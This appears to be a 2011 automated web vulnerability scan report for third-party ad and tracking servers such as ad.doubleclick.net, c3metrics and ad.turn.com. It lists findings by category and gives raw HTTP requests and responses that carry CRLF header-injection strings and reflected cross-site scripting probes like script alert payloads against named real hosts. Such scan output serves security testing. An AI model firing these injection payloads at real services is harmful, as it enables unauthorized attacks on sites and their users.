2.1. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet [REST URL parameter 1]
2.2. http://ad.doubleclick.net/adj/sql.home/database [REST URL parameter 1]
2.3. http://ad.doubleclick.net/adj/sql.home/general [REST URL parameter 1]
3. Cross-site scripting (reflected)
3.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
3.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
3.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
3.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
3.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
3.8. http://ad.turn.com/server/pixel.htm [fpid parameter]
3.9. http://ad.z5x.net/st [name of an arbitrarily supplied request parameter]
3.10. http://data.inskinmedia.com/trackports/rep/base/track.php [callback parameter]
3.11. http://data.inskinmedia.com/trackports/rep/base/track.php [type parameter]
3.12. http://delivery.steelhousemedia.com/serve [advid parameter]
3.13. http://delivery.steelhousemedia.com/serve [aid parameter]
3.14. http://delivery.steelhousemedia.com/serve [cb parameter]
3.15. http://delivery.steelhousemedia.com/serve [cgid parameter]
3.16. http://delivery.steelhousemedia.com/serve [cid parameter]
3.17. http://delivery.steelhousemedia.com/serve [ck parameter]
3.18. http://delivery.steelhousemedia.com/serve [eid parameter]
3.19. http://delivery.steelhousemedia.com/serve [guid parameter]
3.20. http://delivery.steelhousemedia.com/serve [ms parameter]
3.21. http://delivery.steelhousemedia.com/serve [name of an arbitrarily supplied request parameter]
3.22. http://delivery.steelhousemedia.com/serve [pp parameter]
3.23. http://delivery.steelhousemedia.com/serve [segid parameter]
3.24. http://delivery.steelhousemedia.com/serve [sh_ref parameter]
3.25. http://delivery.steelhousemedia.com/serve [sh_rid parameter]
3.26. http://ib.adnxs.com/ab [ccd parameter]
3.31. http://js.revsci.net/gateway/gw.js [bpid parameter]
3.32. http://js.revsci.net/gateway/gw.js [csid parameter]
3.33. http://license.icopyright.net/rights/offer.act [urs parameter]
3.34. http://license.icopyright.net/rights/offer.act [urt parameter]
3.35. http://license.icopyright.net/rights/postPdfServiceGroup.act [urs parameter]
3.36. http://license.icopyright.net/rights/postPdfServiceGroup.act [urt parameter]
3.37. http://license.icopyright.net/rights/postServiceGroup.act [urs parameter]
3.38. http://license.icopyright.net/rights/postServiceGroup.act [urt parameter]
3.39. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]
4.1. http://a.tribalfusion.com/crossdomain.xml
4.2. http://ad.doubleclick.net/crossdomain.xml
4.3. http://ad.turn.com/crossdomain.xml
4.4. http://aperture.displaymarketplace.com/crossdomain.xml
4.5. http://api.facebook.com/crossdomain.xml
4.6. http://b.scorecardresearch.com/crossdomain.xml
4.7. http://bh.contextweb.com/crossdomain.xml
4.8. http://bs.serving-sys.com/crossdomain.xml
4.9. http://cdn.turn.com/crossdomain.xml
4.10. http://data.inskinmedia.com/crossdomain.xml
4.11. http://dp.specificclick.net/crossdomain.xml
4.12. http://ds.serving-sys.com/crossdomain.xml
4.13. http://external.ak.fbcdn.net/crossdomain.xml
4.14. http://i.w55c.net/crossdomain.xml
4.15. http://ib.adnxs.com/crossdomain.xml
4.16. http://img.mediaplex.com/crossdomain.xml
4.17. http://js.revsci.net/crossdomain.xml
4.18. http://adadvisor.net/crossdomain.xml
4.19. http://api.demandbase.com/crossdomain.xml
4.20. http://api.tweetmeme.com/crossdomain.xml
4.21. http://delivery.steelhousemedia.com/crossdomain.xml
4.22. http://edge.sharethis.com/crossdomain.xml
4.23. http://feeds.bbci.co.uk/crossdomain.xml
4.24. http://googleads.g.doubleclick.net/crossdomain.xml
4.25. http://ibnlive.in.com/crossdomain.xml
5. Silverlight cross-domain policy
5.1. http://ad.doubleclick.net/clientaccesspolicy.xml
5.2. http://b.scorecardresearch.com/clientaccesspolicy.xml
6.1. http://api.demandbase.com/api/v2/ip.json
6.2. http://l.sharethis.com/pview
6.3. http://license.icopyright.net/rights/tag.act
8. Cookie without HttpOnly flag set
8.1. http://license.icopyright.net/rights/tag.act
8.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
8.3. http://a.tribalfusion.com/j.ad
8.4. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
8.5. http://ad.trafficmp.com/a/bpix
8.6. http://ad.turn.com/server/pixel.htm
8.7. http://ad.yieldmanager.com/pixel
8.8. http://ad.yieldmanager.com/unpixel
8.9. http://ads.revsci.net/adserver/ako
8.10. http://ads.revsci.net/adserver/ako
8.11. http://ak1.abmr.net/is/tag.contextweb.com
8.12. http://b.scorecardresearch.com/b
8.13. http://b.scorecardresearch.com/p
8.14. http://b.scorecardresearch.com/r
8.15. http://bh.contextweb.com/bh/rtset
8.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs
8.17. http://cw-m.d.chango.com/m/cw
8.18. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
8.20. http://delivery.steelhousemedia.com/serve
8.21. http://future.grapeshot.co.uk/tech/channels.cgi
8.22. http://i.w55c.net/ping_match.gif
8.23. http://js.revsci.net/gateway/gw.js
9.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
9.2. http://delivery.steelhousemedia.com/serve
10. Cookie scoped to parent domain
10.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
10.2. http://a.tribalfusion.com/j.ad
10.3. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
10.4. http://ad.trafficmp.com/a/bpix
10.5. http://ad.turn.com/server/pixel.htm
10.6. http://ads.revsci.net/adserver/ako
10.7. http://ads.revsci.net/adserver/ako
10.8. http://ak1.abmr.net/is/tag.contextweb.com
10.9. http://b.scorecardresearch.com/b
10.10. http://b.scorecardresearch.com/p
10.11. http://b.scorecardresearch.com/r
10.12. http://bh.contextweb.com/bh/rtset
10.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs
10.14. http://cw-m.d.chango.com/m/cw
10.15. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
10.17. http://delivery.steelhousemedia.com/serve
10.18. http://future.grapeshot.co.uk/tech/channels.cgi
10.19. http://i.w55c.net/ping_match.gif
10.21. http://id.google.com/verify/EAAAAFhuTOo3sUWykPGD2UWXAkw.gif
10.22. http://js.revsci.net/gateway/gw.js
11. Cross-domain Referer leakage
11.1. http://a.tribalfusion.com/j.ad
11.2. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
11.3. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
11.4. http://ad.doubleclick.net/adj/fut.gb.tr/news.Internet
11.5. http://ad.doubleclick.net/adj/sql.home/database
11.6. http://ad.doubleclick.net/adj/sql.home/database
11.7. http://ad.doubleclick.net/adj/sql.home/database
11.8. http://ad.doubleclick.net/adj/sql.home/database
11.9. http://ad.doubleclick.net/adj/sql.home/database
11.10. http://ad.doubleclick.net/adj/sql.home/general
11.11. http://ad.doubleclick.net/adj/sql.home/general
11.12. http://ad.doubleclick.net/adj/sql.home/general
11.13. http://adadvisor.net/adscores/g.js
11.14. http://bh.contextweb.com/bh/drts
11.15. http://cdn.optmd.com/V2/85280/214235/index.html
11.16. http://cm.g.doubleclick.net/pixel
11.17. http://cm.g.doubleclick.net/pixel
11.18. http://delivery.steelhousemedia.com/serve
11.19. http://dp.specificclick.net/
11.20. http://googleads.g.doubleclick.net/pagead/ads
11.21. http://googleads.g.doubleclick.net/pagead/ads
11.22. http://googleads.g.doubleclick.net/pagead/ads
11.23. http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js
11.24. http://license.icopyright.net/rights/offer.act
11.25. http://license.icopyright.net/rights/tag.act
12. Cross-domain script include
12.1. http://a.tribalfusion.com/j.ad
12.2. http://getfirebug.com/firstrun
12.3. http://googleads.g.doubleclick.net/pagead/ads
12.4. http://googleads.g.doubleclick.net/pagead/ads
12.5. http://googleads.g.doubleclick.net/pagead/ads
12.7. http://license.icopyright.net/rights/offer.act
12.8. http://license.icopyright.net/rights/tag.act
13.1. http://api.demandbase.com/
13.2. http://bh.contextweb.com/
13.3. http://dp.specificclick.net/
13.4. http://future.grapeshot.co.uk/
14.1. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/controls.js
14.2. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/dragdrop.js
14.3. http://cdn.static.techradar.com//default/js/jquery.colorbox-min.js
14.4. http://getfirebug.com/styles/master.css
14.5. http://getfirebug.com/styles/reset.css
14.6. http://getfirebug.com/styles/screen.css
15. Private IP addresses disclosed
15.1. http://api.facebook.com/restserver.php
15.2. http://connect.facebook.net/en_US/all.js
15.3. http://external.ak.fbcdn.net/safe_image.php
15.4. http://external.ak.fbcdn.net/safe_image.php
15.5. http://external.ak.fbcdn.net/safe_image.php
15.6. http://external.ak.fbcdn.net/safe_image.php
15.7. http://external.ak.fbcdn.net/safe_image.php
16.1. http://a.tribalfusion.com/j.ad
16.2. http://ad.doubleclick.net/adj/sql.home/database
16.3. http://ad.turn.com/server/pixel.htm
16.4. http://ad.yieldmanager.com/pixel
16.6. http://api.facebook.com/restserver.php
16.7. http://b.scorecardresearch.com/p
16.8. http://bs.serving-sys.com/BurstingPipe/adServer.bs
16.9. http://cdn.optmd.com/V2/85280/214235/index.html
16.10. http://cdn.turn.com/server/ddc.htm
16.11. http://cm.g.doubleclick.net/pixel
16.12. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js
16.13. http://feeds.bbci.co.uk/news/rss.xml
16.14. http://googleads.g.doubleclick.net/pagead/ads
16.16. http://img.mediaplex.com/content/0/15017/130144/VNXe_SQL_enterprise_640X480_1.js
16.17. http://license.icopyright.net/3.7009
17. Multiple content types specified
18. HTML does not specify charset
18.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
18.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs
18.3. http://data.inskinmedia.com/trackports/rep/base/track.php
18.4. http://ibnlive.in.com/xml/network18/topibnlivewidgets.html
19. Content type incorrectly stated
19.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
19.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs
19.3. http://cdn.static.techradar.com///default/js/ads_seg_bottom.js
19.4. http://data.inskinmedia.com/trackports/rep/base/track.php
19.5. http://delivery.steelhousemedia.com/serve
19.6. http://getfirebug.com/fonts/TitilliumMaps26L001.woff
19.7. http://getfirebug.com/fonts/TitilliumMaps26L002.woff
19.8. http://images.outbrain.com/imageserver/s/16837/aX4BWSJRgIsv4moXL4vKEgee-0-95x80.jpg&did=Dvf8N
19.9. http://license.icopyright.net/rights/images/favicon.ico
20. Content type is not specified
Severity: | High |
Confidence: | Tentative |
Host: | http://cm.g.doubleclick |
Path: | /pixel |
GET /pixel%00'?nid=themig&can Host: cm.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://ibnlive.in.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 404 Not Found Date: Thu, 23 Jun 2011 13:47:17 GMT Content-Type: text/html; charset=UTF-8 Server: Cookie Matcher Content-Length: 11837 X-XSS-Protection: 1; mode=block <!DOCTYPE html> <html lang=en> <meta charset=utf-8> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html ...[SNIP]... |
GET /pixel%00''?nid=themig&can Host: cm.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://ibnlive.in.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 403 Forbidden Content-Length: 1207 Content-Type: text/html Date: Thu, 23 Jun 2011 13:47:20 GMT Server: GFE/2.0 <html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/fut.gb.tr/news |
GET /3f09c%0d%0a48ca2a73d2/fut.gb.tr/news.Internet Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.techradar.com |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/3f09c 48ca2a73d2/fut.gb.tr/news.Internet Date: Thu, 23 Jun 2011 13:48:57 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/sql.home/database |
GET /8578b%0d%0a97541f8cd5d/sql.home/database;abr= Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.sqlmag.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8578b 97541f8cd5d/sql.home/database;abr= Date: Thu, 23 Jun 2011 13:44:47 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/sql.home/general |
GET /463d2%0d%0aca985ddeaf1/sql.home/general;abr= Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.sqlmag.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/463d2 ca985ddeaf1/sql.home/general;abr= Date: Thu, 23 Jun 2011 14:18:48 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://ibnlive.in.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011 |
HTTP/1.1 200 OK Date: Thu, 23 Jun 2011 13:44:50 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 48031988<script>alert(1)< Set-Cookie: 48031988<script>alert(1)< Set-Cookie: 48031988<script>alert(1)< Content-Length: 6691 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ar.c3VJScollection[a]=new c3VTJSInter();this ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://ibnlive.in.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011 |
HTTP/1.1 200 OK Date: Thu, 23 Jun 2011 13:44:50 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_06-20-2011 Set-Cookie: 480-VT=advertop100_06-16 Set-Cookie: 480-nUID=adver_16385 Content-Length: 6691 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ar.c3VJScollection[a] ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://ibnlive.in.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011 |
HTTP/1.1 200 OK Date: Thu, 23 Jun 2011 13:44:54 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_06-20-2011 Set-Cookie: 480-VT=advertop100_06-16 Set-Cookie: 480-nUID=adver_75540 Content-Length: 6679 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... .c3VJSnuid='75540429 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://ibnlive.in.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011 |
HTTP/1.1 200 OK Date: Thu, 23 Jun 2011 13:44:52 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_06-20-2011 Set-Cookie: 480-VT=advertop100_06-16 Set-Cookie: 480-nUID=adver_45468 Content-Length: 6690 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... d='451931075376';this ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://ibnlive.in.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011 |
HTTP/1.1 200 OK Date: Thu, 23 Jun 2011 13:44:52 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_06-20-2011 Set-Cookie: 480-VT=advertop100_06-16 Set-Cookie: 480-nUID=adver_10557 Content-Length: 6692 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ='480';this.C3VTcallVar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: 480-adver-view.c3metrics Proxy-Connection: keep-alive Referer: http://ibnlive.in.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=451931075376; 480-SM=adver_06-20-2011 |
HTTP/1.1 200 OK Date: Thu, 23 Jun 2011 13:44:53 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_06-20-2011 Set-Cookie: 480-VT=advertop100_06-16 Set-Cookie: 480-nUID=adver_10710 Content-Length: 6678 Connection: close Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... S.c3VJSnuid='1071086 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/fut.gb.tr/news |
GET /adj/fut.gb.tr/news Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.techradar.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 345 Date: Thu, 23 Jun 2011 13:45:19 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=bd9a6"><script>alert(1)< Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://ibnlive.in.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: adImpCount=o4ZhYxPJ2 |